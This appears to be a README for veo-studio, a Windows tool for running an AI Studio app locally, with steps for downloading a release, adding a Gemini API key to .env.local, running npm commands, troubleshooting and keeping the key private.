veo-studio helps you run your AI Studio app on your Windows PC. It gives you a simple way to download the app, set it up, and start using it locally.
Use it when you want to:
- run the app on your own computer
- test changes without a web browser setup
- keep your work on your machine
- open your AI Studio app from Windows with a few steps
Visit the release page and download and run the file for Windows:
Look for the latest release and choose the Windows file if it is listed there. Save it to your computer, then open it from your Downloads folder or desktop.
Follow these steps on a Windows PC:
- Open the release page.
- Download the Windows version of veo-studio.
- If the file is a ZIP file, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to start it.
- If Windows asks for permission, choose Run anyway only if you trust the file source.
If the release page gives you an installer, run the installer and follow the steps on screen.
You may need these items for the app to run well:
- Windows 10 or Windows 11
- A stable internet connection
- Enough free space to download the app
- A Gemini API key if the app asks for one
- Access to your Downloads folder
If you plan to use the local development version, you may also need Node.js.
Some parts of veo-studio need a Gemini API key.
To add it:
-
Open the app folder.
-
Find the file named
.env.local. -
Open it with Notepad.
-
Add your key in this format:
GEMINI_API_KEY=your_api_key_here -
Save the file.
-
Start the app again.
If you do not have a key yet, get one from your Gemini account before you start.
If you are using the source version on your computer, follow these steps:
-
Install Node.js if it is not already on your PC.
-
Open the app folder.
-
Open Command Prompt in that folder.
-
Run:
npm install -
Add your
GEMINI_API_KEYin.env.local. -
Start the app with:
npm run dev -
Wait for the app to finish loading.
-
Open the local address shown in the window or terminal.
If this is your first time using veo-studio, use this order:
- Download the release from GitHub.
- Open the file you downloaded.
- Complete any setup steps on screen.
- Add your Gemini API key if needed.
- Start the app.
- Check that the main screen loads.
If the app does not open, close it and try again after checking the file you downloaded.
Here are some files and folders that may appear in the app folder:
.env.local— stores your API keynode_modules— files added after installpackage.json— app settingssrc— app source filespublic— images and static files
You do not need to edit most of these files unless you are changing how the app works.
If the app does not start, try these steps:
- Check that you downloaded the latest release
- Open the file again as administrator
- Make sure the file finished downloading
- Open
.env.local - Check that
GEMINI_API_KEY=is set - Remove extra spaces before or after the key
- Check your internet connection
- Close other apps that use a lot of memory
- Restart your PC and try again
- Make sure Node.js is installed
- Open Command Prompt again in the app folder
- Try the command one more time
- Wait a moment for the page to load
- Refresh the window
- Start the app again from the same folder
When a new release is available:
- Return to the release page.
- Download the latest Windows file.
- Replace the old file or install the new one.
- Open the app again.
- Check that your
.env.localfile still has your API key
If you changed settings before, keep a copy of your old folder first.
After the app starts, you can use it like this:
- open the app from Windows
- load your AI Studio project
- test the app on your own machine
- keep your API key in the local config file
- restart the app when you make changes
Your Gemini API key gives access to your account. Keep it private.
Good habits:
- do not share
.env.local - do not post your key in chat or email
- keep a backup of the file in a safe place
- replace the key if you think it was exposed
If you need to check the release files or get the app again, use the download page:
If you are setting up the local version, make sure Node.js is installed and that .env.local has your GEMINI_API_KEY value before you run npm run dev
veo-studio is built for people who want a local way to run an AI Studio app on Windows. It fits simple local use, quick testing, and basic setup without extra steps.